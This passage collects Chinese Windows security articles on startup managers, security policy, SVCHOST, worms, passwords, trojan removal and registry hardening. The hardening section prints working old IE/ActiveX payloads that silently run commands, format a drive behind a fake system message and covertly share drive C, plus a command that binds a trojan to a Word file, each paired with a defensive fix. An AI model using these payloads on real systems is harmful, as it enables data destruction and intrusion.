  只需要将startup.cpl文件拷贝到Windows安装目录下的system32文件夹下面即可,单击“开始→设置→控制面板”打开控制面板,你会发现里面多了一个Startup项,双击打开它,在打开的对话框中,可以方便地对“启动”文件夹和注册表中的启动项目进行管理,如右击空白处新建一个启动项,右击已有的启动项目可以对其进行编辑、删除、禁用和立刻运行等操作。
软件性质: 免费,绿色软件
推荐指数: ★★★★★

  四、StartupMonitor
  双击StartupMonitor.msi执行安装,安装完成后,它就乖乖的在后台运行,只占据100多KB的内存,什么时候才显示出它的本事呢?当你安装了一个软件的时候,如果它想自己偷偷自启动,嘿嘿,就必须通过StartupMonitor的这一关,如所示,它管得非常宽,无论是什么程序,它都不放过!渔歌强烈推荐。
软件性质: 免费,小巧实用
推荐指数: ★★★★★

  五、StartStop
  软件安装后它会将自己加到注册表的RunOnce自启动,启动后会自动缩小到托盘区一个小图标,双击即可打开StartStop主界面,在这里列出了本机启动程序,右击某个程序可以选择总是启动、从不启动还是每次询问是否启动,如所示,它有特色的一个地方是单击菜单“Options→Startup delay”,可以设置启动时延迟多少时间启动程序。
软件性质: 免费, 有特色
推荐指数: ★★★★

  六、Autoruns
  下载autoruns.zip后解压缩直接执行里面的autoruns.exe即可,由于它不会在启动时加载,显得更绿色。双击autoruns.exe打开程序界面,它不仅仅列出的是非常全的启动项,而且详细地列出了启动程序的公司和路径,如果还不满意,右击某个启动项目,选择属性,可以查看该启动项的文件属性。它还有两个特色功能,一个是右击任何一个启动项,选择Jump to就会立刻跳转到具体的位置,如跳转到注册表的具体键值、打开启动文件夹、打开INI文件等,非常方便!还有一个功能是单击View菜单,可以切换是否显示所有的启动位置、是否显示启动的服务、是否只显示非Microsoft公司的项目,这对于检查启动项目和过滤项目非常有用。
软件性质: 免费,绿色软件
推荐指数: ★★★★★

  七、StartUp Organizer
  Startup Organizer的组织和管理自启动项功能很强大,它在控制启动项目方面做的也比较细,如为某个启动设定声音提示,还能设置在Windows启动时按某个键来控制某些程序启动与否,还可以备份自启动配置文件以便应急恢复、比较启动程序的变化、恢复第一次运行时的默认配置,操作也比较简单,遗憾之处就是不是免费的。
软件性质: 共享软件,30天免费试用

网络安全不变之法则:五大手段确保高枕无忧
写下你的安全策略

  出色的安全性不可能一蹴而就。如果你的企业文化趋向于凡事都不正规,要想达到出色的安全性基本上就只有靠运气。要想获得最好的企业安全,必须经过坚持不懈的努力,以及强大的决心。每个公司都需要一个安全策略。不要等到发生入侵之后才想起来制定这个策略;现在就开始制定一个,才能防患于未然。请访问WatchGuard的Security Awareness网站,上面提供了一份免费的白皮书,它描述了如何拟定您的策略(PDF),同时省去昂贵的专家咨询费用或者长达几个季度的自行摸索。

  2. 防火墙必不可少

  令人吃惊的是,现在许多组织(最典型就是大学)都在运行着没有防火墙保护的公共网络。让我们姑且忽略有关“硬件防火墙好,还是软件防火墙好”的争论,无论采用哪一种防火墙,总比没有防火墙好。这里的重点在于,连接到Internet的每一个人都需要在其网络入口处采取一定的措施来阻止和丢弃恶意的网络通信。当你读到本文的时候,说明您已经有了一个企业防火墙。但是,不要忘了您的远程办公人员和移动用户。最低限度也应该为他们每个人配备一个个人防火墙。虽然Windows XP SP2自带的防火墙也勉强可用,但为了满足您的特殊需要,市场上还存在着大量产品可供挑选。最主要的事情就是去使用它们。

  3. 随时更新桌面防病毒系统

  有趣的是,1999年我们鼓励用户“每周”检查一次防病毒更新。如今,各个厂商都提供了自动的签名更新。只要你一直都连在Internet上,它们就能在一个新的安全威胁被发现后的数小时内下载到您的机器上。但基本的道理是一样的:良好的安全性要求你在每个桌面都配备防病毒功能,并随时更新它。虽然在一个网络的网关那里建立防病毒机制能解决一部分问题,但在整个防病毒战线中,您只能把网关防病毒视为一道附加的防线,而不能把它视为桌面防病毒的一个替代品。

  4. 强化您的服务器

  “强化”(Hardening)涉及两个简单的实践法则:购买商业软件时,删除您不需要的所有东西;如果不能删除,就把它禁用。可以通过强化来删除的典型对象包括示例文件、使用向导演示、先用后付费的捆绑软件以及在可以预见的将来不准备使用的高级特性。安装越复杂,越有可能留下安全隐患,所以将您的安装精简到不能再精简的程度。除此之外,设备和软件通常配置了默认用户名/密码访问、来宾(guest)和匿名帐户以及默认共享。删除你不需要的,并修改所有身份验证凭据的默认值(由于有像这样的列表,所以黑客也知道它们)。在这个充斥着大量“臃肿件”(bloatware)的年代,这个实践法则与5年前相比更重要了。

  5. 补丁策略必不可少

  2001年,当“红色代码”(Code Red)浮现的时候,它攻击的一个漏洞,是Microsoft在9个月前就提供了免费补丁以便用户修补的。但是,这个蠕虫仍然快速和大面积地蔓延,原因是管理员们没有下载和安装这个补丁。今天,从一个新的漏洞被发现开始,到新的大规模攻击工具问世为止,两者间隔时间已经缩短了许多。在厂商发布安全补丁的时候,IT管理员需要做出快速响应。补丁管理目前是最热门的IT主题之一,但是和许多事情一样,80/20规则在这里仍然适用。如果没有商业评估工具以及较多的预算,可以用已经淘汰掉的“太慢”的机器来组建一个小的测试网络。这样一来,只需使用企业级工具来建立一个专业实验室所需的20%的付出,就能获得一个80%有用的测试环境。Microsoft,Apple以及其他许多组织都基本上每个月提供一次安全补丁。访问和安装那些补丁应该成为您的工作内容和计划任务的一部分。不要事后才采取行动。

  听起来很简单,是吗?您知道真正做起来要比本文讲的难得多。但是,在这个充满不确定因素的世界中,掌握一些已知不变的基本经验法则,您将始终有一个准则,把它们当作您工作中的依托。在您产生任何疑虑的时候,请根据它们来整理自己的思路。在未来的1000篇WatchGuard安全电子邮件中,它们将指导我们一直按照正确的路线前进!

剖析进程中SVCHOST的作用和原理
走进SVCHOST

  SVCHOST进程现在是声名狼藉,本来Windows用它来启动各种服务,可是偏偏病毒、木马也想尽办法来利用它,企图利用它的特性来迷惑用户,达到感染、入侵、破坏的目的(如冲击波变种病毒“W32.Welchia.Worm”),弄的大家草木皆兵一见有SVCHOST就怀疑自己是否已经中招,其实Windows系统存在多个SVCHOST进程是很正常的,在受感染的机器中到底哪个是病毒进程呢?这里仅举一例来说明。

  假设Windows XP系统被“W32.Welchia.Worm”感染了。正常的SVCHOST文件存在于“C:/Windows/system32”目录下,如果发现该文件出现在其他目录下就要小心了。“W32.Welchia.Worm”病毒存在于“C:/Windows/system32/wins”目录中,因此使用进程管理器查看SVCHOST进程的执行文件路径就很容易发现系统是否感染了病毒。Windows系统自带的任务管理器不能够查看进程的路径,可以使用第三方进程管理软件,如“Windows优化大师”进程管理器,通过这些工具就可很容易地查看到所有的SVCHOST进程的执行文件路径,一旦发现其执行路径为不平常的位置就应该马上进行检测和处理。

  在基于NT内核的Windows操作系统家族中,不同版本的Windows系统,存在不同数量的“SVCHOST”进程,用户使用“任务管理器”可查看其进程数目。一般来说,Win2000有两个SVCHOST进程,WinXP中则有四个或四个以上的SVCHOST进程(以后看到系统中有多个这种进程,千万别立即判定系统有病毒了哟),而Win2003 server中则更多。这些SVCHOST进程提供很多系统服务,如:RpcSs服务(Remote Procedure Call)、dmserver服务(Logical Disk Manager)、Dhcp服务(DHCP Client)等。

  如果要了解每个SVCHOST进程到底提供了多少系统服务,可以在Win2000的命令提示符窗口中输入“Tlist -S”命令来查看,该命令是Win2000 Support Tools提供的。在WinXP则使用“tasklist /svc”命令。

  深入分析SVCHOST

  Windows系统进程分为独立进程和共享进程两种,“SVCHOST.EXE”文件存在于“%SystemRoot%/system32/”目录下,它属于共享进程。随着Windows系统服务不断增多,为了节省系统资源,微软把很多服务做成共享方式,交由SVCHOST.EXE进程来启动。但SVCHOST进程只作为服务宿主,并不能实现任何服务功能,即它只能提供条件让其他服务在这里被启动,而它自己却不能给用户提供任何服务。那这些服务是如何实现的呢?

  原来这些系统服务是以动态链接库(DLL)形式实现的,它们把可执行程序指向SVCHOST,由SVCHOST调用相应服务的动态链接库来启动服务。那SVCHOST又怎么知道某个系统服务该调用哪个动态链接库呢?这是通过系统服务在注册表中设置的参数来实现。下面就以RpcSs(Remote Procedure Call)服务为例,进行讲解。实例:笔者以Windows XP为例,点击“开始”/“运行”,输入“services.msc”命令,弹出服务对话框,然后打开“Remote Procedure Call”属性对话框,可以看到RpcSs服务的可执行文件的路径为“C:/WINDOWS/system32/svchost -k rpcss”,这说明RpcSs服务是依靠SVCHOST调用“rpcss”参数来实现的,而参数的内容则是存放在系统注册表中的。

  在运行对话框中输入“regedit.exe”后回车,打开注册表编辑器,找到[HKEY_LOCAL_MACHINE/ SYSTEM/CurrentControlSet/Services/RpcSs]项,找到类型为“REG_EXPAND_SZ”的键“magePath”,其键值为“%SystemRoot%/system32/svchost -k rpcss”(这就是在服务窗口中看到的服务启动命令),另外在“Parameters”子项中有个名为“ServiceDll”的键,其值为“%SystemRoot%/system32/rpcss.dll”,其中“rpcss.dll”就是rpcss服务要使用的动态链接库文件。这样SVCHOST进程通过读取“RpcSs”服务注册表信息,就能启动该服务了。

防止网络蠕虫病毒的技巧以及策略
每一次蠕虫的爆发都会给社会带来巨大的损失。2001 年9 月18 日,Nimda 蠕虫被发现,对Nimda 造成的损失评估数据从5 亿美元攀升到26 亿美元后,继续攀升,到现在已无法估计。目前蠕虫爆发的频率越来越快,尤其是近两年来,越来越多的蠕虫(如冲击波、振荡波等)出现。对蠕虫进行深入研究,并提出一种行之有效的解决方案,为企业和政府提供一个安全的网络环境成为我们急待解决的问题。

什么是蠕虫

Internet 蠕虫是无须计算机使用者干预即可运行的独立程序,它通过不停地获得网络中存在漏洞的计算机上的部分或全部控制权来进行传播。

蠕虫与病毒的最大不同在于它不需要人为干预,且能够自主不断地复制和传播。蠕虫程序的工作流程可以分为漏洞扫描、攻击、传染、现场处理四个阶段。蠕虫程序扫描到有漏洞的计算机系统后,将蠕虫主体迁移到目标主机。然后,蠕虫程序进入被感染的系统,对目标主机进行现场处理。现场处理部分的工作包括:隐藏、信息搜集等。不同的蠕虫采取的IP生成策略可能并不相同,甚至随机生成。各个步骤的繁简程度也不同,有的十分复杂,有的则非常简单。

蠕虫的行为特征包括:

·自我繁殖:

·利用软件漏洞:

·造成网络拥塞:

·消耗系统资源:

·留下安全隐患:

蠕虫的工作方式归纳如下:随机产生一个IP 地址;判断对应此IP 地址的机器是否可被感染;如果可被感染,则感染之;重复1~3 共m 次,m 为蠕虫产生的繁殖副本数量。

如何检测蠕虫

由以上的分析可知,尽早地发现蠕虫并对感染蠕虫的主机进行隔离和恢复,是防止蠕虫泛滥、造成重大损失的关键。

目前国内并没有专门的蠕虫检测和防御系统,传统的主机防病毒系统并不能对未知的蠕虫进行检测,只能被动地对已发现的特征的蠕虫进行检测。而且目前市场上的入侵检测产品,对蠕虫的检测也多半是基于特征,所以我们利用ids提供的异常检测功能,通过发现网络中的异常,来对蠕虫的传染进行控制。虽然有些事后诸葛的嫌疑,但只要发现及时,还是能大大减少蠕虫造成的损失。

在对未知蠕虫的检测方面,入侵检测在对流量异常的统计分析和对tcp连接异常的分析基础上,又使用了对ICMP数据异常分析的方法,可以更全面地检测网络中的未知蠕虫。这种网络蠕虫的检测技术是Bob Gray,具体实现过程是:当一台主机向一个不存在的主机发起连接时,中间的路由器会产生一个ICMP-T3(目标不可达)包返回给蠕虫主机。

这种方法可以检测出具有高速、大规模传染模型的网络蠕虫。(很难检测针对某个网络传播的特定的蠕虫和慢速传播的蠕虫。这两种蠕虫,可以认为对整个网络来说,它们的危害比较小)。

全方位的蠕虫防治策略

当蠕虫被发现时,要在尽量短的时间内对其进行响应。首先产生报警,通知管理员,并通过防火墙、路由器、或者HIDS的互动将感染了蠕虫的主机隔离;然后对蠕虫进行分析,进一步制定检测策略,尽早对整个系统存在的不安全隐患进行修补,防止蠕虫再次传染,并对感染了蠕虫的主机进行蠕虫的删除工作。

对于感染了蠕虫的主机时,其防治策略是这样的:

1.与防火墙互动:通过控制防火墙的策略,对感染主机的对外访问数据进行控制,防止蠕虫对外网的主机进行感染。

2.交换机联动:通过SNMP协议进行联动,当发现内网主机被蠕虫感染时,可以切断感染主机同内网的其他主机的通讯,防止感染主机在内网的大肆传播。

3.通知HIDS(基于主机的入侵监测):装有HIDS的服务器接收到监测系统传来的信息,可以对可疑主机的访问进行阻断,这样可以阻止受感染的主机访问服务器,使服务器上的重要资源免受损坏。

4.报警:产生报警,通知网络管理员,对蠕虫进行分析后,可以通过配置Scaner来对网络进行漏洞扫描,通知存在漏洞的主机到Patch服务器下载补丁进行漏洞修复,防治蠕虫进一步传播。

密码设置的秘诀
现在大多数电脑用户都有许多密码,有的用于email,有的用于银行结算,有的用于自己钟爱的分销店会员注册,还有的用于……要记住所有这些注册码和密码实非易事,而我们却因为需要,还在不断设立新的密码。为了让我们所设立的这些密码都是非常容易记忆 的,我们不得不选择的做法是遵从简单、易背的原则。现在,赛门铁克告诉您,我们面临的挑战是创建一个防黑客密码,如果您按上面的原则做了,就恰好陷入了黑客的陷阱!

  为了让您走出设立密码的误区,远离黑客,以下是一些来自网络安全专家赛门铁克的设立防黑客密码的秘诀。在一般情况下,建议您设立密码时:

  * 使用大写字母和小写字母、标点和数字的集合

  * 在不同账号里使用不同的密码

  * 有规律的更换密码。为了容易记起要更换密码,将它和一件事联系起来。例如在每月的第一天或发薪日更换密码。

  * 密码至少要6个字符。您的密码字符数越多,就越难被查出。

  * 使用一个方便您记忆的密码,那么您便不必写下来了。

  密码选择使用以下指导来避免遭受攻击:

  * 不要使用和您有关的姓名和数字,如出生日期或是绰号

  * 不要以任何形式使用您的用户名或是注册名

  * 不要使用您的名字,或是家庭成员或宠物的名字

  * 不要使用任何语言的单个字作为密码

  * 不要使用“密码”(“password”)作为密码

  * 不要使用可轻易获得的关于您的信息。这包括执照号码、电话号码、社会安全号码、您的手机号码、您所居住的街道的名字,等等。
这么多的建议和“不要”原则,如此说来,您也许会问,按照上述建议设立的密码是否将十分复杂,且难于记忆?先不必着急,下面将告诉您——

  如何记住您的密码

  密码应随时记住且不可写下来。您可以使用一些工具来帮助您选择一个易于记忆,但是仍然很难被窃取的密码。

  * 选出一句歌词,使用句中每一单词的第一个字母,将只取首字母的缩写词作为密码。

  * 选择两个没有任何共同点的短词,将他们用标点或数字连接起来,如“moss9desk”。

  * 使用一个熟悉的短语,但是要用数字“0”来代替字母“O”,诸如此类。

  尽管说了这么多便于记忆且难于被黑客攻破的密码设立原则,但要是真“一时兴起”,给忘了怎么办?别急,下面赛门铁克还将交您——

  密码如何存储

  如果您觉得在头脑里分门别类地记住各种各样的密码很繁琐的话,那么有一些方式可以帮您记忆您的密码。其中一些甚至允许您即使是在路上或是使用不同的电脑时也可访问您所存储的密码。

  * 密码存储软件

  有很多种程序,如桌面软件密码解决方案,它可使您存储所有注册名和密码,并只须使用您记忆最深刻的一个密码便可访问其余那些。一些程序将您的密码加密,如此便防止密码被偷看。桌面软件密码解决方案的一个缺点是只有您在使用电脑并运行该程序的时候,您才能够访问您存储的密码。如果您仅是使用家用电脑来网上冲浪、在线购物和银行结算,这种方式值得借鉴。

  * 在线密码存储

  在线有很多种密码存储方式,无论您在世界的任何角落,只要您的电脑连接上了互联网,您就可以一天24小时连续访问您存储的用户名和密码。在线存储有很多方式还提供了128-bit加密技术,可确保人们在畅游网络时的密码安全。一些在线的存储站点能将您的密码存储在其服务器上,可能还不够安全。但为了做到安全预警,不少在线服务也能将您的密码存储在您的电脑中,那么密码将很少受到篡改。

  * 在线图形密码存户

  这种方式可使您轻松记住一个密码并能打开其余的密码。“密码”(“password”)实际上就是人们每一天行为的一系列图形展示,就像洗洗刷刷。您所要记住的一切就是用什么口令完成访问密码的动作。当您选择了一个很难被窃取的密码时,务必要确保密码的安全,且尽量使其安全性进一步提高。不要将您的密码email给任何人(永远不么干),如果有人打电话给您询问您的密码,千万不要告诉他们。另外,在公司内部,正式的IT职员应在访问系统之前得到授权。一旦您创建了一个很好的密码,您可用赛门铁克的“诺顿网络安全特警”来确保密码的安全。“诺顿网络安全特警”提供了针对病毒、黑客和机密威胁的全面防护功能。它对于使用互联网进行购物、银行结算、冲浪或通信的用户而言,是必不可少的。

自己动手清除电脑中的木马程序
首先查看自己的电脑中是否有木马

  1、集成到程序中

  其实木马也是一个服务器-客户端程序,它为了不让用户能轻易地把它删除,就常常集成到程序里,一旦用户激活木马程序,那么木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使木马被删除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。绑定到某一应用程序中,如绑定到系统文件,那么每一次Windows启动均会启动木马。

  2、隐藏在配置文件中

  木马实在是太狡猾,知道菜鸟们平时使用的是图形化界面的操作系统,对于那些已经不太重要的配置文件大多数是不闻不问了,这正好给木马提供了一个藏身之处。而且利用配置文件的特殊作用,木马很容易就能在大家的计算机中运行、发作,从而偷窥或者监视大家。不过,现在这种方式不是很隐蔽,容易被发现,所以在Autoexec.bat和Config.sys中加载木马程序的并不多见,但也不能因此而掉以轻心哦。

  3、潜伏在Win.ini中

  木马要想达到控制或者监视计算机的目的,必须要运行,然而没有人会傻到自己在自己的计算机中运行这个该死的木马。当然,木马也早有心理准备,知道人类是高智商的动物,不会帮助它工作的,因此它必须找一个既安全又能在系统启动时自动运行的地方,于是潜伏在Win.ini中是木马感觉比较惬意的地方。大家不妨打开Win.ini来看看,在它的[windows]字段中有启动命令“load=”和“run=”,在一般情况下“=”后面是空白的,如果有后跟程序,比方说是这个样子:run=c:/windows/file.exe load=c:/windows/file.exe

  这时你就要小心了,这个file.exe很可能是木马哦。
4、伪装在普通文件中

  这个方法出现的比较晚,不过现在很流行,对于不熟练的windows操作者,很容易上当。具体方法是把可执行文件伪装成图片或文本----在程序中把图标改成Windows的默认图片图标, 再把文件名改为*.jpg.exe, 由于Win98默认设置是"不显示已知的文件后缀名",文件将会显示为*.jpg, 不注意的人一点这个图标就中木马了(如果你在程序中嵌一张图片就更完美了)。
 
  5、内置到注册表中

  上面的方法让木马着实舒服了一阵,既没有人能找到它,又能自动运行,真是快哉!然而好景不长,人类很快就把它的马脚揪了出来,并对它进行了严厉的惩罚!但是它还心有不甘,总结了失败教训后,认为上面的藏身之处很容易找,现在必须躲在不容易被人发现的地方,于是它想到了注册表!的确注册表由于比较复杂,木马常常喜欢藏在这里快活,赶快检查一下,有什么程序在其下,睁大眼睛仔细看了,别放过木马哦:HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion下所有以“run”开头的键值;HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion下所有以“run”开头的键值;HKEY-USERS/.Default/Software/Microsoft/Windows/CurrentVersion下所有以“run”开头的键值。

  6、在System.ini中藏身

  木马真是无处不在呀!什么地方有空子,它就往哪里钻!这不,Windows安装目录下的System.ini也是木马喜欢隐蔽的地方。还是小心点,打开这个文件看看,它与正常文件有什么不同,在该文件的[boot]字段中,是不是有这样的内容,那就是shell=Explorer.exe file.exe,如果确实有这样的内容,那你就不幸了,因为这里的file.exe就是木马服务端程序!另外,在System.ini中的[386Enh]字段,要注意检查在此段内的“driver=路径/程序名”,这里也有可能被木马所利用。再有,在System.ini中的[mic]、[drivers]、[drivers32]这三个字段,这些段也是起到加载驱动程序的作用,但也是增添木马程序的好场所,现在你该知道也要注意这里喽。

  7、隐形于启动组中

  有时木马并不在乎自己的行踪,它更注意的是能否自动加载到系统中,因为一旦木马加载到系统中,任你用什么方法你都无法将它赶跑(哎,这木马脸皮也真是太厚),因此按照这个逻辑,启动组也是木马可以藏身的好地方,因为这里的确是自动加载运行的好场所。动组对应的文件夹为:C:/windows/start menu/programs/startup,在注册表中的位置:HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/
Explorer/ShellFolders Startup="C:/windows/start menu/programs/startup"。要注意经常检查启动组哦!

  8、隐蔽在Winstart.bat中

  按照上面的逻辑理论,凡是利于木马能自动加载的地方,木马都喜欢呆。这不,Winstart.bat也是一个能自动被Windows加载运行的文件,它多数情况下为应用程序及Windows自动生成,在执行了Win.com并加载了多数驱动程序之后开始执行(这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知)。由于Autoexec.bat的功能可以由Winstart.bat代替完成,因此木马完全可以像在Autoexec.bat中那样被加载运行,危险由此而来。
9、捆绑在启动文件中

  即应用程序的启动配置文件,控制端利用这些文件能启动程序的特点,将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件,这样就可以达到启动木马的目的了。

  10、设置在超级连接中

  木马的主人在网页上放置恶意代码,引诱用户点击,用户点击的结果不言而喻:开门揖盗!奉劝不要随便点击网页上的链接,除非你了解它,信任它,为它死了也愿意等等。

下面再看木马的清除方法

1、检查注册表中RUN、RUNSERVEICE等几项,先备份,记下可以启动项的地址, 再将可疑的删除。

2、删除上述可疑键在硬盘中的执行文件。

3、一般这种文件都在WINNT,SYSTEM,SYSTEM32这样的文件夹下,他们一般不会单独存在,很可能是有某个母文件复制过来的,检查C、D、E等盘下有没有可疑的.exe,.com或.bat文件,有则删除之。

4、检查注册表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER/SOFTWARE/Microsoft/Internet Explorer/Main中的几项(如Local Page),如果被修改了,改回来就可以。

5、检查HKEY_CLASSES_ROOT/inifile/shell/open/command和HKEY_CLASSES_ROOT/txtfile/shell/open/command等等几个常用文件类型的默认打开程序是否被更改。这个一定要改回来。很多病毒就是通过修改.txt,.ini等的默认打开程序让病毒“长生不老,永杀不尽”的。

6、如果有可能,对病毒的母文件进行反汇编,比如我上次中的那个病毒,通过用IDA反汇编,发现它还偷窃系统密码并建立 %systemroot%/system/mapis32a.dll 文件把密码送到一个邮箱中,由于我用的是W2K,所以它当然没有得手。

  至此,病毒完全删除! 笔者建议有能力的话,时刻注意系统的变化,奇怪端口、可疑进程等等。 现在的病毒都不象以前那样对系统数据破坏很严重,也好发现的多,所以尽量自己杀毒(较简单的病毒、木马)。

修改注册表防范十大攻击
目前,针对Windows的攻击方式越来越多,除了黑客攻击手段越来越多,用户未能给系统及时打上补丁也是一个重要的原因。除了打补丁以外呢?我们还应该注意些什么呢?其实,在现有的条件下,修改注册表把其中的漏洞都堵上,也未尝不是一个好方法,本文讲述的正是这个问题,教你修改注册表防范十大攻击。

ActiveX漏洞防范方法 WORD执行木马漏洞防范方法
IE6的执行任何程序漏洞防范方法 IE的ActiveX控件被绕过漏洞防范方法
浏览网页硬盘被共享漏洞防范方法 防止LM散列被破解
防范共享入侵 禁止空连接
防范脚本病毒攻击 防范其他攻击

  1、ActiveX漏洞防范方法

  ActiveX漏洞主要针对IE5.5(含)及其以下版本,对OE、Outlook、Foxmail等也有着巨大的威胁。概况说来,就是把com.ms.activeX.ActiveXComponent对象嵌入<APPLET>标记可能导致任意创建和解释执行ActiveX对象,从而可以创建任意文件,运行程序,写注册表。举个例子,在嵌入com.ms.activeX.ActiveXComponent对象后,在IE的默认安全级别“中”状态下,打开包含以下脚本的HTML文件也会运行一个命令提示符,但没有任何警告。甚至还可以使程序在后台运行,这就要“归功”于嵌入的com.ms.activeX.ActiveXComponent对象了,正是它导演了这一幕!具体代码如下:

<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
<SCRIPT>
function runcmd()
{
a=document.applets[0];
a.setCLSID('');
a.createInstance();
wsh=a.GetObject();
wsh.Run('cmd.exe');//改为"wsh.Run('cmd.exe',false,1);"则程序在后台隐藏运行
}
setTimeout('runcmd()',10);
</SCRIPT>

  运行的结果会打开一个命令提示符,但整个运行过程中没有任何提示。如果你还没有意识到这有多么危险,那么请你注意了,如果我们把将上面的代码“wsh.Run('cmd.exe');”改为下面这两句(其它的不变):

wsh.Run('start/m format.com d:/q/autotest/u');
alert('IMPORTANT : Windows is removing unused temporary files.');

  这样做的结果又会怎么样呢?呵呵,你的D盘要被格式化了!听到硬盘狂响,大多数人会以为Windows正在移除临时文件,因为屏幕上显示:IMPORTANT: Windows is removing unused temporary files.,其实这是个幌子,用来欺骗我们的!此时在后台进行的是格式化硬盘命令!等到发觉则悔之晚矣……

  修改注册表的防范方法:

  禁用WSHShell对象,阻止运行程序。删除或更名系统文件夹中的wshom.ocx文件或删除注册表项:
HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/
2、WORD执行木马漏洞防范方法

  利用WORD来隐藏木马是最近才流行起来的一种方法。方法是新建一个DOC文件,然后利用VBA写一段特定的代码,把文档保存为newdoc.doc,然后把木马程序这个DOC文件放在同一个目录下,运行如下命令:copy /b xxxx.doc+xxxxx.exe newdoc.doc把这两个文件合并在一起(在Word文档末尾加入木马文件),如图1所示只要别人点击这个所谓的Word文件就会中木马!其中,参数“/b”表示你所合并的文件为二进制格式的。如果是文本文件则加上参数“/a”,代表是ASCII格式。

 

图 1

  不过,以上方法能得以实现的前提是你的WORD2000安全度为最低的时候才行,即HKEY_CURRENT_USER/Software/Microsoft/Office/9.0/Word/Security中的Level值必须是1或者0。大家知道,当Level值为3的时候(代表安全度为高),WORD不会运行任何宏;Level值为2时(安全度中),WORD会询问你是否运行宏;Level值为1的时候(安全度低),WORD就会自动运行所有的宏!聪明的你一定想到如果这个值为0的时候会怎么样?哈,如果设为0的话,WORD就会显示安全度为高,但却能自动运行任何的宏!是不是很恐怖啊?

  要想把WORD的安全度在注册表中的值改为0,方法非常多,利用网页恶意代码修改浏览者的注册表就可以。我想这方面大家都有很多经验,就不多说了。对于这种欺骗方式,最重要的是小心防范,陌生人的附件千万不要收看!网上的链接也不要随意点击,如要点击请确认是否为.DOC文件,如是则一定不要直接点击查看!

  3、IE6的执行任何程序漏洞防范方法

  对于使用IE6.0的用户来说有个可怕的漏洞,该漏洞的存在导致可以在网页中执行任何程序,并可以绕过IE的ActiveX安全设置,即便你禁用ActiveX控件,网页中的恶意程序照样可以运行!举个例子,如果网页中含有下列代码,可以无声无息地执行你的记事本程序!想想看,如果这里不是记事本程序,换作其他的程序会怎么样?代码如下:

<body></body>
<SCRIPT>
html='<OBJECT CLASSID="CLSID:12345678" '
html+=' CODEBASE="c:/windows/notepad.exe"></OBJECT>';
/注意:上面的notepad.exe的路径请修改为你系统对应的路径document.body.innerHTML=html;
</SCRIPT>

  这个漏洞的主要原因是IE安全设置都是针对非本地的页面或交互的,对于本地的安全设置IE是最大信任的。如果你注意看IE的安全设置,都是对Internet和Intranet上WEB服务器而言的,根本就没有对本地文件的安全设置。概括说来就是IE对本地安全采用最大信任原则。

  解决办法:挖出IE的本地安全设置选项。打开注册表编辑器,顺次展开到:HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/0,在右边窗口中找到DWORD值“Flags”,默认键值为十六进制的21(十进制33),双击“Flags”,在弹出的对话框中将它的键值改为“1”即可,关闭注册表编辑器。无需重新启动电脑,重新打开IE,再次点击“工具→Internet选项→安全”标签,你就会看到多了一个“我的电脑”图标(如图2),在这里你可以对IE的本地安全进行配置。修改IE安全设置中有关“我的电脑”的设置,选定后,禁用ActiveX下载就万事大吉了。

 

图 2

  另外,打了补丁之后,会弹出一个对话框(如图3),并拒绝运行该网页中所含的程序,所以经常给自己的电脑打补丁是必不可少的。

4、IE的ActiveX控件被绕过漏洞防范方法

  虽然说IE提供对于"下载已签名的ActiveX控件"进行提示的功能,但是恶意攻击代码会绕过IE,在无需提示的情况下下载和执行ActiveX控件程序,而这时恶意攻击者就会取得对系统的控制权限。如果要屏蔽此类黑手,可以打开注册表编辑器,然后展开如下分支:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/,请为Active Setup controls创建一个基于CLSID的新键值{6E449683_C509_11CF_AAFA_00AA00 B6015C},然后在新键值下创建一个REG_DWORD类型的键Compatibility,并设定键值为0x00000400即可。

  5、浏览网页硬盘被共享漏洞防范方法

  浏览网页硬盘被共享,也是一个常见的漏洞,受害者都是在浏览了含有有害代码的ActiveX网页文件后中招的。以下是其原代码中的关键部分:

<script language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
<!--ActiveX初始化过程-->
a1=document.applets[0];
a1.setCLSID("");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Flags",302,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Type",0,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Path","C://");
}
function init()
{
setTimeout("f()", 1000);
<!--实现打开页面后1秒钟内执行测试修改注册表的工作-->
}
init();
</script>

注意:以“Shl.RegWrite”开头的这几句代码的作用是写入浏览者的注册表,在HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Network/LanMan下面添加键值“RWC$” ,在RWC$”下又分别建立键值“Flags”、“Type”“Path”,这样就把C盘设为共享了,共享名为RWC$。而且你在网络属性中还看不到硬盘被共享了!如果把"Flags"=dword:00000302改成"Flags"=dword:00000402就可看到硬盘被共享。

  解决办法:把系统所在目录下的system子目录下面的Vserver.vxd文件(Microsoft 网络上的文件与打印机共享虚拟设备驱动程序)删掉,再到注册表中,把HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/VxD/下的Vserver键值删掉即可。
6、防止LM散列被破解

  尽管Windows的大多数用户不需要LAN Manager的支持,微软还是在Windows NT和2000系统里缺省安装了LAN Manager口令散列。由于LAN Manager使用的加密机制比微软现在的方法脆弱,LAN Manager的口令能在很短的时间内被破解。LAN Manager散列的主要脆弱性在于:

  1.长的口令被截成14个字符
  2.短的口令被填补空格变成14个字符
  3.口令中所有的字符被转换成大写
  4.口令被分割成两个7个字符的片断,像这样:

  --------------------------------------------------------
  | 1st 8bytes of LM hash | second 8bytes of LM hash |
  --------------------------------------------------------
  from first 7 chars    from second 7 chars

